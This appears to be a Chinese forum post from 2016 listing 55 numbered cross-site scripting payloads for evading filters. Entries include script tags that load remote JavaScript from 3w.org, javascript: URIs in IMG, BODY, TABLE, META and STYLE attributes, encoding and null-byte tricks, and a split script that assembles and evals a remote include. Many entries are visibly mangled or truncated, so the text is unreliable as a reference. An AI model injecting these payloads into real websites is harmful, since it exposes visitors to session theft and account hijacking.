(1)普通的XSS JavaScript注入
6 Y* Z% t& o2 i6 r7 a1 s' l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 I# G) C$ k) n
(99)另类弹框
2 ?4 H/ x5 f$ O<q/oncut=alert()>1) G L0 s6 R) j( U3 I" a0 h9 k
<s/onclick=alert()>b1 r. s5 T. T9 K# A+ A- w4 ]4 u% @
<XSS=" onclick="alert(1)//">clickme</SSX="># K- O' n: Y) N2 ^
<zzz onclick=alert`1`>clickme</zzz>
* H1 t; l5 I5 g' d <a onclick=alert`1`>clickme</a># D) G4 z) H- d/ h
<a=">clickme</a=">& ]+ }/ r4 c; ]( ?+ W
<a=">clickme</a>/ s! \" u# e' w5 e0 ]
<z=">clickme</z=">
% u: |! l' x/ W6 Q c/ n<z onclick=alert`1`>clickme</z>
8 q- b: s6 I. h2 q6 W+ n2 ]" r2 w# |( X1 X5 v9 d
(2)IMG标签XSS使用JavaScript命令! [6 H3 G5 l [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& [* k% k# [, h& O" K
1 M, z" N4 e2 U(3)IMG标签无分号无引号
$ j* X9 [/ K- m9 X. ~; G5 B) }<IMG SRC=javascript:alert(‘XSS’)>
) {4 S- z+ e/ o5 i1 d) e6 f2 q# P7 R& Y' }3 W3 O3 H0 ]0 c7 v+ i
(4)IMG标签大小写不敏感' |, |+ s* e' u0 P. R) R/ x$ L
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: j1 z7 a0 Q/ v; `6 i g0 ?; A
% c7 r! z: b i1 O(5)HTML编码(必须有分号)
- i7 [% X# L- D, H5 K# R5 p<IMG SRC=javascript:alert(“XSS”)>/ d5 q4 x9 A& R0 y$ B
/ b. v( ~$ j% P$ F
(6)修正缺陷IMG标签# [1 }5 U, E; N. S
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, Q: l# |$ `7 |1 B, Z8 W1 ~
~" S d, D: E8 W(7)formCharCode标签(计算器)
3 N6 n" |, z8 r; b* G9 A8 b<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>- N9 e/ k0 |6 Z2 D; f
' `5 D6 t/ K' m) b) i(8)UTF-8的Unicode编码(计算器)
6 v" @8 S; \) Q5 A6 a<IMG SRC=jav..省略..S')>
! r' x9 Q: M3 b: L6 W8 r. Y. C0 R' L9 M4 b% _1 F6 f# e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 E' p& Z7 p/ b; }<IMG SRC=jav..省略..S')>- M. _* [# k0 U( k2 J: J A
- Q& Z+ x+ w) u& j+ t
(10)十六进制编码也是没有分号(计算器)( m7 \( p ^* ?5 \2 V1 r) L
<IMG SRC=\'#\'" /span>. \1 r7 M' ?+ |& s
% f9 I! i+ P, I9 q4 Z(11)嵌入式标签,将Javascript分开% v8 ]: u* t* ~1 A7 X/ K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
) z& V1 j2 @# @7 z
$ R/ |6 v. L+ ~6 o( {: e! [(12)嵌入式编码标签,将Javascript分开
/ O9 X1 h F7 L: S<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. R' G8 S! s) G# f8 U9 O4 v% l# x* Y# o) F+ s( c4 e
(13)嵌入式换行符
: P$ s: U/ y7 O- u- U+ S4 S<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; v& ]) {! p5 f& }+ ^, }
: H0 }% }7 E3 i(14)嵌入式回车" b3 z. S+ a2 {0 U) J
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
) u2 Y. |2 Z2 W: s2 J ?" y: O9 F. @0 l* M4 n: M
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 S" j/ ]+ M" T5 e: V1 K! s: [<IMG SRC=\'#\'" /span>
! b& d0 S9 [* ~ Q. |* `7 a# C" ~" e% k! f* f
(16)解决限制字符(要求同页面)' Y1 q8 P& \4 H: ^0 m; O# f2 j
<script>z=’document.’</script>
* r$ M5 m f4 ~& }3 }! v7 t<script>z=z+’write(“‘</script>
5 C, i6 G8 Y7 a* W/ K7 n<script>z=z+’<script’</script>$ Q2 C4 ^! D/ V! z; J, l5 \
<script>z=z+’ src=ht’</script>
6 I/ n+ t8 y, j5 O% q) O& O# w1 N<script>z=z+’tp://ww’</script>4 K" y* m3 w) o3 I, B
<script>z=z+’w.shell’</script>+ H+ @( D5 `. \0 E( N
<script>z=z+’.net/1.’</script># c; |* \, ^2 c) b" `8 d6 B) Z
<script>z=z+’js></sc’</script>
( H- f C: j' _- q& A3 F7 M) J% z<script>z=z+’ript>”)’</script>- U8 p; m+ P$ s- H( L
<script>eval_r(z)</script>
+ W) e$ M A0 o! ~
' W& P8 T# t" O& m( b! \. p; R/ b(17)空字符: A0 X+ H" i/ N9 z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
m( i0 c6 p- K# u) [/ W7 S- n6 p, Q) q4 k9 n
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 h5 ?. w% ?9 lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 j( }" o6 `4 l
& I# Z8 v H+ }
(19)Spaces和meta前的IMG标签* g% W" ~0 V$ Q/ J, w& B+ G
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>6 O, C$ [# w+ ]1 W Q
1 p( A L; v* r4 [7 A% K: j(20)Non-alpha-non-digit XSS
; [0 a1 z5 _; e( X V<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
5 g; D& `0 n) m& |* y
, m1 {5 o" {, G: ~/ {* ^/ {0 `(21)Non-alpha-non-digit XSS to 2
) |$ w* J3 J! L/ M- c. e<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 B" o" z2 g) }, d+ r/ u
/ {. s: _7 }! ^; a' B9 o
(22)Non-alpha-non-digit XSS to 3
& M0 A: ?; B3 G9 M0 T0 q" ~- g<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>% t/ L* z& Z9 y( q5 T
4 O6 C# C6 t4 C# V% J(23)双开括号
5 A9 y7 d: O* _' `/ ?- V<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* C x8 h* ?3 s/ T! Y+ F
4 a3 L' ?; F7 b9 y( h(24)无结束脚本标记(仅火狐等浏览器)
3 N, V/ ^5 X0 s<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>" y- P, x- ~! ]" j) s
. n( Z& c& ]% `3 q, e" \9 J(25)无结束脚本标记2
" h3 J2 i+ [; r3 i t' y7 V3 j<SCRIPT SRC=//3w.org/XSS/xss.js>
, S7 r3 C/ L% o- f% {# V9 Y$ G$ }; q2 Q. x* a; @: D! z; F
(26)半开的HTML/JavaScript XSS+ V* g- ^+ W' x; P- z
<IMG SRC=\'#\'" /span>' F& K5 {, ]; Z8 E
( N2 @- Q, [/ e8 D' s6 q+ L7 e; w
(27)双开角括号
- o0 N6 J5 ~& Q2 }<iframe src=http://3w.org/XSS.html <
' y! M3 t' E% w' l* Y, }' w0 d0 q4 I5 V1 X
(28)无单引号 双引号 分号 l' H8 K E; d+ f/ k5 ~3 W
<SCRIPT>a=/XSS/
9 ]# x. e, p1 C* {. D) O3 Falert(a.source)</SCRIPT>
/ X" u4 E- O9 y! O# E% K4 p
+ \7 B1 W6 d$ L! i; [(29)换码过滤的JavaScript
! }3 W7 g" n) j$ \\”;alert(‘XSS’);//
0 x% `- \" \# C2 e7 J) A' f/ K- j8 U5 ^* a4 X- h
(30)结束Title标签: R2 W) P! y5 h# k
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% o" P4 Q3 K$ I+ N. c9 T( d9 W4 H$ r# j- `8 S
(31)Input Image' N9 n3 ^& {1 z
<INPUT SRC=\'#\'" /span>4 ~/ P3 c: D5 G: T
0 [. R! Q# |4 _& N8 x4 z
(32)BODY Image, o+ Z7 j3 x e9 y& K
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( v; D2 ~& b6 P1 ?* K' H y0 x
; g4 }- H# t# X' s+ w, C, t0 K6 E9 g
(33)BODY标签
8 u/ H7 ]& b$ l5 ?3 g$ b<BODY(‘XSS’)># n( a1 }' ^; Z8 X3 j4 p1 [
4 H* ]1 C9 w* t4 |(34)IMG Dynsrc
6 V' R1 g3 H3 t/ ]<IMG DYNSRC=\'#\'" /span>2 m* {' o$ b* {" C+ \; h$ Y% l* K
0 ~5 z, j# a6 F% D: l6 C5 N* I
(35)IMG Lowsrc
, L+ I0 I0 N1 U+ e: i; j+ p9 ~3 x<IMG LOWSRC=\'#\'" /span>
& s4 B' O) W7 W0 P9 d6 z- a, i' h1 t5 s2 L! ~
(36)BGSOUND8 t" n U# d) j: G
<BGSOUND SRC=\'#\'" /span>
- v7 g) g) @% u+ I# b6 r
9 g" {$ a, t7 F% x) m(37)STYLE sheet, h# ]# O( e) M( ?* v
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# E2 S8 B8 ^: z; s2 j
* ?% X: z S2 Y(38)远程样式表
, M( t4 f% J' D' Z" C F<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 M' n, g2 F2 E# v0 V
4 ^$ A! v7 T8 S M C6 f) M
(39)List-style-image(列表式)
$ P G8 [, E, ~- b4 G% B1 C9 i<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! ?" I9 v* @9 A4 M5 z' q% k1 x! }- `, I: }0 j D- E, v% _% H! s
(40)IMG VBscript" K% r! x- I! p! E& l
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
\% d" {; Y2 P
+ F1 {6 T/ ^1 M# U" y O U8 v2 T: A+ }$ f(41)META链接url
4 X! C( U. ?$ @4 e& @% ]5 V* y3 O) ~<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
' D9 @2 |! o4 Q8 X* }7 s- j; ^
; h% i C; @3 Q(42)Iframe! H. j" Q; o( x1 R S) G
<IFRAME SRC=\'#\'" /IFRAME>
" m z- f3 t2 ^5 m. p5 t; v- @
- E+ D/ S `9 s7 {) b# M* M(43)Frame$ }! Z* J% j/ }$ k" C# _
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>- w5 W! p7 V& K ~& z" j3 o
2 W- ]+ K/ o* v2 u: ^
(44)Table
8 Y. |) I. e& ]2 u* ]9 P<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 E! V! D# h: N0 B" h* t! q. Q
9 S4 e* f, o. N# `6 y2 k0 U(45)TD1 d6 c0 x: v8 ]! G! l
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 n4 o4 H& t" j: S
5 d. m$ D. h: } V$ f
(46)DIV background-image. S% B4 y- t+ s( p9 F( J, n8 U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) {1 g0 J$ t2 x2 B; K: F
" [0 E, k& O& h! u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
4 c/ M" y" g9 C" N2 K# k# y<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”> u6 {/ k' T5 |
/ i- s. v- V# }7 ^(48)DIV expression# z9 f4 p" Q' P1 J( E3 a9 Z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, U7 P! }, d& L# f9 i4 i4 k4 D5 t% @$ _5 G; Y
(49)STYLE属性分拆表达
" S L* m8 D3 U<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>% |0 p) d) {- J6 \, g& q
+ R% Z& W, m! V" d- D0 e$ Q
(50)匿名STYLE(组成:开角号和一个字母开头)6 P. j X' E! G$ e) J
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 D/ E, h2 o5 ]$ y5 t7 M% \" e
( d4 @$ J; p% h(51)STYLE background-image8 A; u1 j) \6 w! L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>( S! n$ B+ {7 x: S1 `, ?
8 x+ @3 s# B% e% h, S0 i(52)IMG STYLE方式 Y( p8 X4 _! Y P3 h
exppression(alert(“XSS”))’>) P: S- g0 G0 `
( n2 t. u0 M! n% I; k. W( h A- y. v(53)STYLE background
- f) V8 p: g. P+ [<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! I8 [$ z$ w! M6 w8 M7 R
7 r$ j+ _% P% [9 c3 O3 d2 b# R(54)BASE
4 N4 P6 h& Y; w3 z) n: W" {<BASE HREF=”javascript:alert(‘XSS’);//”>
0 Y! K c$ u9 w0 X. D( U
/ p; I/ [ W* V' j6 l z( R: o(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' z" C8 ^8 [5 G
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
, b" U: P5 i4 n0 Z& g" \* Y |
发表于 2016-4-28 10:06:15
收藏
支持
反对